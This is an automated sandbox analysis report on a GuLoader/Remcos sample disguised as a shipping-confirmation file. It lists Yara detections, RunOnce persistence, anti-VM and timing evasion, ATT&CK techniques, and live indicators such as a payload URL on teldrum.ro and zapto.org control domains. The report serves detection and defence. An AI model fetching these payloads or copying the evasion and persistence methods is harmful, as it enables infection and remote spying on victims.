                  Source: Yara matchFile source: 00000000.00000002.2125848795.000000000316C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2983718490.00000000016FC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2125848795.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2983718490.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2125582739.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nsc44DF.tmp, type: DROPPED
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_733B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_733B1BFF
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_733B30C0 push eax; ret 0_2_733B30EE
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.batJump to dropped file
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.batJump to dropped file
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SnecksJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SnecksJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SnecksJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SnecksJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeAPI/Special instruction interceptor: Address: 3A7B03F
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeAPI/Special instruction interceptor: Address: 200B03F
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeRDTSC instruction interceptor: First address: 3A4181B second address: 3A4181B instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 test ax, 00001EA8h 0x00000009 cmp ebx, ecx 0x0000000b jc 00007FD4987EABFCh 0x0000000d cmp ch, ah 0x0000000f inc ebp 0x00000010 test di, 449Ah 0x00000015 inc ebx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeRDTSC instruction interceptor: First address: 1FD181B second address: 1FD181B instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 test ax, 00001EA8h 0x00000009 cmp ebx, ecx 0x0000000b jc 00007FD498D1604Ch 0x0000000d cmp ch, ah 0x0000000f inc ebp 0x00000010 test di, 449Ah 0x00000015 inc ebx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeWindow / User API: threadDelayed 3431Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeWindow / User API: threadDelayed 2472Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeWindow / User API: threadDelayed 972Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeWindow / User API: foregroundWindowGot 1668Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7704Thread sleep count: 3431 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948Thread sleep count: 2472 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948Thread sleep time: -7416000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7932Thread sleep count: 114 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7932Thread sleep time: -114000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948Thread sleep count: 972 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe TID: 7948Thread sleep time: -2916000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeThread sleep count: Count: 3431 delay: -5Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000000.00000002.2125194668.00000000006CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8p
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4399
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4404
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_733B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_733B1BFF
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"Jump to behavior
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIG\
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIGJump to behavior
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Access Token Manipulation
                  11
                  Masquerading
                  11
                  Input Capture
                  31
                  Security Software Discovery
                  Remote Services11
                  Input Capture
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  12
                  Process Injection
                  2
                  Virtualization/Sandbox Evasion
                  LSASS Memory2
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Remote Access Software
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Registry Run Keys / Startup Folder
                  1
                  Access Token Manipulation
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin Shares1
                  Clipboard Data
                  1
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading
                  12
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information
                  LSA Secrets3
                  File and Directory Discovery
                  SSHKeylogging113
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials23
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe30%VirustotalBrowse
                  Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe61%ReversingLabsWin32.Trojan.Guloader
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat61%ReversingLabsWin32.Trojan.Guloader
                  C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://teldrum.ro/NJrdZqNcCtz102.binL0%Avira URL Cloudsafe
                  https://teldrum.ro/NJrdZqNcCtz102.bin0x0%Avira URL Cloudsafe
                  https://teldrum.ro/NJrdZqNcCtz102.binA0%Avira URL Cloudsafe
                  https://teldrum.ro/NJrdZqNcCtz102.binHipssFricrestereamuschilor.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
                  https://teldrum.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
                  linktreewealth.zapto.org0%Avira URL Cloudsafe
                  https://teldrum.ro/0%Avira URL Cloudsafe
                  linktreewealthy.zapto.org0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  linktreewealth.zapto.org
                  0.0.0.0
                  truefalse
                    high
                    teldrum.ro
                    109.99.162.14
                    truefalse
                      high
                      linktreewealthy.zapto.org
                      0.0.0.0
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://teldrum.ro/NJrdZqNcCtz102.binfalse
                        • Avira URL Cloud: safe
                        unknown
                        linktreewealth.zapto.orgtrue
                        • Avira URL Cloud: safe
                        unknown
                        linktreewealthy.zapto.orgtrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                          high
                          https://teldrum.ro/NJrdZqNcCtz102.binLAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://teldrum.ro/NJrdZqNcCtz102.bin0xAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                            high
                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                              high
                              http://www.ftp.ftp://ftp.gopher.Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                high
                                https://teldrum.ro/NJrdZqNcCtz102.binAAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nsis.sf.net/NSIS_ErrorErrorAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, Halvdelene.bat.4.drfalse
                                  high
                                  https://teldrum.ro/NJrdZqNcCtz102.binHipssFricrestereamuschilor.ro/NJrdZqNcCtz102.binAwb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2990368035.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://teldrum.ro/Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  109.99.162.14
                                  teldrum.roRomania
                                  9050RTDBucharestRomaniaROfalse
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1592408
                                  Start date and time:2025-01-16 05:09:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 21s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:6
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@3/10@3/1
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:
                                  • Successful, ratio: 84%
                                  • Number of executed functions: 47
                                  • Number of non-executed functions: 34
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  04:10:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Snecks C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat
                                  04:11:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Snecks C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat
                                  23:11:28API Interceptor57271x Sleep call for process: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  109.99.162.14oXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                    2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                      inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                          x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                  z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      linktreewealth.zapto.orginward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 0.0.0.0
                                                      x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 43.226.229.209
                                                      LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 43.226.229.209
                                                      2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 43.226.229.209
                                                      teldrum.rooXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 109.99.162.14
                                                      2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 109.99.162.14
                                                      inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 109.99.162.14
                                                      x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                      • 109.99.162.14
                                                      z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      RTDBucharestRomaniaROboatnet.arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                      • 80.97.224.164
                                                      bot.ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 86.34.169.190
                                                      i486.elfGet hashmaliciousMiraiBrowse
                                                      • 109.99.197.55
                                                      oXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 109.99.162.14
                                                      2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 109.99.162.14
                                                      inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 80.97.224.140
                                                      BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 109.99.162.14
                                                      x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 109.99.162.14
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19153776434-874356550.05.exeGet hashmaliciousUnknownBrowse
                                                      • 109.99.162.14
                                                      download.bin.exeGet hashmaliciousNjrat, XRedBrowse
                                                      • 109.99.162.14
                                                      Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                      • 109.99.162.14
                                                      BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                      • 109.99.162.14
                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                      • 109.99.162.14
                                                      00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                      • 109.99.162.14
                                                      00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                      • 109.99.162.14
                                                      Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 109.99.162.14
                                                      138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                      • 109.99.162.14
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dlloXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                                        2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                                          inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                                              x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                    2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                      2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                        2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                          Process:C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):216
                                                                          Entropy (8bit):3.3621035037924156
                                                                          Encrypted:false
                                                                          SSDEEP:3:rglsLlFmFM2Q55JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:MlsLlkCL55YcIeeDAlOWAAe5q1gWAv
                                                                          MD5:003C8B3F694F8D4F5064AF74919DCF90
                                                                          SHA1:293E37B882584AD1A71DF24C56E25643D985B517
                                                                          SHA-256:3E4F375E18FD840BC933AB921C0B846F00E6259BB6743BDC48CD745C98F8A06B
                                                                          SHA-512:9A85694D4022B11C6594D48155EF62A9152DF79438A0BCD4875D522060D9D55731762CC5AA2BC8C0C04932C0B42DD61039196711B7A5D86BE1C4D9588397970D
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                          Reputation:low
